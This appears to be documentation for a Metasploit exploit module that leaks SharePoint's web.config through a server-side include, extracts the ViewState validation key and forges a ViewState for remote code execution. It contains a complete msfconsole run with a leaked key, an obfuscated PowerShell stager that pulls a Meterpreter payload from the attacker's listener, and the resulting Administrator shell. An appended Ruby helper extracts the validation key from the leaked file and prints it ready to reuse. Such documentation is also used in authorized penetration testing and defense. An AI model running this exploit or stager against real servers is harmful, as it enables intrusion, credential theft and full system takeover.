## Vulnerable Application

### Description

This module exploits a server-side include (SSI) in SharePoint to leak the `web.config` file and then forges a malicious ViewState signed with the validation key extracted from it. The exploit is authenticated and requires a user with page creation privileges, which is a standard permission in SharePoint. To perform the SSI, the module creates a randomly named `.aspx` page, reads `web.config` through it, and deletes the page again once the file has been retrieved. The retrieved `web.config` is stored in loot. If you already have the key (for example from a previous run's loot), set the `VALIDATION_KEY` option to short-circuit the SSI step entirely and go straight to triggering the ViewState deserialization.

Tested against SharePoint 2019 on Windows Server 2016.

### Setup

Follow [Microsoft's documentation](https://docs.microsoft.com/en-us/sharepoint/install/install-sharepoint-server-2016-on-one-server).

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Targets

### Windows Command

This executes a Windows command.

### Windows Dropper

This uses a Windows dropper to execute code.

### PowerShell Stager

This uses a PowerShell stager to execute code.

## Options

### HttpUsername

Set this to the SharePoint username.

### HttpPassword

Set this to the SharePoint password.

### VALIDATION_KEY

Set this to the ViewState validation key if you have it. When set, the module skips page creation and the SSI and uses the supplied key directly.

### COOKIE

Set this to a SharePoint cookie if you have one. This is primarily useful for form auth.

## Scenarios

### SharePoint 2019 on Windows Server 2016

```
msf6 > use exploit/windows/http/sharepoint_ssi_viewstate
[*] Using configured payload windows/x64/meterpreter/reverse_https
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > options

Module options (exploit/windows/http/sharepoint_ssi_viewstate):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   COOKIE                           no        SharePoint cookie if you have one
   HttpPassword                     no        SharePoint password
   HttpUsername                     no        SharePoint username
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /                yes       Base path
   URIPATH                          no        The URI to use for this exploit (default is random)
   VALIDATION_KEY                   no        ViewState validation key
   VHOST                            no        HTTP server virtual host

Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   2   PowerShell Stager

msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set rhosts 192.168.123.237
rhosts => 192.168.123.237
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set httpusername Administrator
httpusername => Administrator
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set httppassword Passw0rd!
httppassword => Passw0rd!
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > run

[*] Started HTTPS reverse handler on https://192.168.123.1:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
[*] Creating page for SSI: /z0zL8ruBOIcdq7aVekdlh.aspx
[+] Successfully created page
[*] Leaking web.config
[+] Saved web.config to /Users/wvu/.msf4/loot/20201015131428_default_192.168.123.237_web.config_940022.txt
[+] ViewState validation key: FEF7456DF90E1A6B7CA04D00ED56228602E2AF3C94B7A34F7735D5AFC340C9E4
[*] Deleting /z0zL8ruBOIcdq7aVekdlh.aspx
[+] Successfully deleted page
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
[*] Powershell command length: 2918
[*] Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[+] Successfully executed command
[*] https://192.168.123.1:8443 handling request from 192.168.123.237; (UUID: 8g4qnmlb) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.237:62885) at 2020-10-15 13:15:00 -0500

meterpreter > getuid
Server username: GIBSON\Administrator
meterpreter > sysinfo
Computer        : WIN-G2PGASM3QFA
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : GIBSON
Logged On Users : 18
Meterpreter     : x64/windows
meterpreter >
```
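The step between "Leaking web.config" and "ViewState validation key" in the run above is reading the `<machineKey>` element out of the leaked file. The Ruby below is an added example, not the module's own extraction code: it parses a constructed `web.config` fragment, pulls the `<machineKey>` attributes, and checks whether the `validationKey` is a value you could pass to `VALIDATION_KEY` on a later run, meaning a literal hex key rather than `AutoGenerate`, and one without the `IsolateApps` modifier (under which ASP.NET derives a per-application key instead of using the literal). The two sample configs, their placeholder key values and the function names are all assumptions made for this illustration.

```ruby
require 'rexml/document'

# Constructed web.config fragment standing in for the file the module saves
# to loot. Both key values are placeholders, not real keys.
SAMPLE_WEB_CONFIG = <<~XML
  <configuration>
    <system.web>
      <machineKey validationKey="0A1B2C3D4E5F60718293A4B5C6D7E8F90A1B2C3D4E5F60718293A4B5C6D7E8F9"
                  decryptionKey="00112233445566778899AABBCCDDEEFF"
                  validation="HMACSHA256"
                  decryption="AES" />
    </system.web>
  </configuration>
XML

# Constructed web.config whose keys are auto-generated per application;
# nothing in such a file can be fed to VALIDATION_KEY.
AUTOGEN_WEB_CONFIG = <<~XML
  <configuration>
    <system.web>
      <machineKey validationKey="AutoGenerate,IsolateApps"
                  decryptionKey="AutoGenerate,IsolateApps"
                  validation="SHA1" />
    </system.web>
  </configuration>
XML

# Pull the <machineKey> attributes out of a web.config. Returns nil when the
# element is absent, in which case the keys are inherited from machine.config
# and the leaked file alone does not reveal them.
def extract_machine_key(web_config_xml)
  doc = REXML::Document.new(web_config_xml)
  node = REXML::XPath.first(doc, '//machineKey')
  return nil if node.nil?

  {
    validation_key: node.attributes['validationKey'],
    decryption_key: node.attributes['decryptionKey'],
    validation: node.attributes['validation'] || 'HMACSHA256', # .NET 4.x default
    decryption: node.attributes['decryption'] || 'Auto'
  }
end

# Decide whether the validationKey is a value you can hand to VALIDATION_KEY:
# a literal hex key, not AutoGenerate, and without IsolateApps (ASP.NET then
# derives a per-application key rather than using the literal).
# Returns [usable, reason].
def usable_validation_key?(machine_key)
  return [false, 'no machineKey element'] if machine_key.nil?

  value = machine_key[:validation_key].to_s
  return [false, 'no validationKey attribute'] if value.empty?

  key, *modifiers = value.split(',').map(&:strip)
  return [false, 'validationKey is AutoGenerate'] if key.casecmp('AutoGenerate').zero?
  return [false, 'validationKey uses IsolateApps'] if modifiers.any? { |m| m.casecmp('IsolateApps').zero? }
  return [false, 'validationKey is not hex'] unless key.match?(/\A\h+\z/)
  # ASP.NET accepts 40 to 128 hex characters (20 to 64 bytes) here.
  unless key.length.even? && key.length.between?(40, 128)
    return [false, "unexpected validationKey length #{key.length}"]
  end

  [true, "#{key.length / 2}-byte key, validation=#{machine_key[:validation]}"]
end

# The msfconsole setting to reuse on a later run, or the reason there is none.
def validation_key_setting(web_config_xml)
  machine_key = extract_machine_key(web_config_xml)
  usable, reason = usable_validation_key?(machine_key)
  return "set VALIDATION_KEY #{machine_key[:validation_key]}" if usable

  "no usable key: #{reason}"
end

if $PROGRAM_NAME == __FILE__
  puts validation_key_setting(SAMPLE_WEB_CONFIG)
  puts validation_key_setting(AUTOGEN_WEB_CONFIG)
end
```

Run it against the loot file instead of the embedded samples with `validation_key_setting(File.read(path))`. The `validation` attribute matters as much as the key itself: whatever forges the ViewState has to use the same MAC algorithm the target was configured with, so keep both values together when you record the result.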